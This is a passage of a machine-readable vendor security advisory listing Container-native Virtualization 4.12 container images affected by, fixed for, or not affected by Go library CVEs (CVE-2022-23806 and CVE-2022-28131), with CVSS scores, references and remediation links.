"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-23806", }, { category: "external", summary: "RHBZ#2053429", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2053429", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-23806", url: "https://www.cve.org/CVERecord?id=CVE-2022-23806", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-23806", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-23806", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", url: "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", }, ], release_date: "2022-02-11T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.1, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "LOW", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: crypto/elliptic: IsOnCurve returns true for invalid field elements", }, { cve: "CVE-2022-28131", cwe: { id: "CWE-1325", name: "Improperly Controlled Sequential Memory Allocation", }, discovery_date: "2022-07-14T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2107390", }, ], notes: [ { category: "description", text: "A flaw was found in golang encoding/xml. When calling Decoder, Skip while parsing a deeply nested XML document, a panic can occur due to stack exhaustion and allows an attacker to impact system availability.", title: "Vulnerability description", }, { category: "summary", text: "golang: encoding/xml: stack exhaustion in Decoder.Skip", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-28131", }, { category: "external", summary: "RHBZ#2107390", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107390", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-28131", url: "https://www.cve.org/CVERecord?id=CVE-2022-28131", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-28131", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-28131", }, { category: "external", summary: "https://go.dev/issue/53614", url: "https://go.dev/issue/53614", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", url: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", }, ], release_date: "2022-07-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "LOCAL", availabilityImpact: "HIGH", baseScore: 7.3, baseSeverity: "HIGH", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", 